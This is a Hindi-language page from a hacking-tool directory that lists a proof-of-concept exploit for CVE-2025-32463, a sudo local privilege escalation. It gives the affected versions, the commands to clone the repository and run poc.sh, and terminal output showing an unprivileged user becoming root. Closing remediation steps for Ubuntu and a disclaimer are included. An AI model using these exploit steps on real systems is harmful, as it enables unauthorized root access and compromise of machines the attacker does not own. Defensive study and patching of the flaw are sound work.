Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/zinzloun/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubzinzloun/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 – पूर्व-संकलित .so के साथ Sudo EoP एक्सप्लॉइट (PoC)

रिपॉजिटरी देखें
1471 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32463 – Sudo EoP एक्सप्लॉइट (PoC) पूर्व-संकलित लाइब्रेरी के साथ

इस रिपॉजिटरी में CVE-2025-32463 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो sudo में Rich Mirch द्वारा खोजी गई एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है।

श्रेय

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस कोड का उपयोग उन सिस्टमों पर न करें जिनके स्वामी आप नहीं हैं या जिनके मूल्यांकन की आपके पास स्पष्ट अनुमति नहीं है।


🔧 आवश्यकताएँ

  • chroot समर्थन (-R) वाला sudo: संस्करण 1.9.14 से 1.9.17
  • nsswitch सक्षम

🚀 POC कैसे चलाएं

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

जांचें कि क्या वर्तमान उपयोगकर्ता के पास कम विशेषाधिकार हैं

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

आवश्यकताएँ जांचें

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

एक्सप्लॉइट चलाएं

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 Ubuntu 24.04 LTS पर उपचार

  • इंटरनेट से जुड़े सिस्टमों के लिए बस चलाएं

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • एयर-गैप्ड सिस्टमों के लिए: आप नवीनतम sudo पैकेज यहाँ से प्राप्त कर सकते हैं: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb। एक बार पैकेज को लक्षित सिस्टम पर स्थानांतरित कर दिए जाने के बाद, बस चलाएं:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
टूल डाउनलोड करें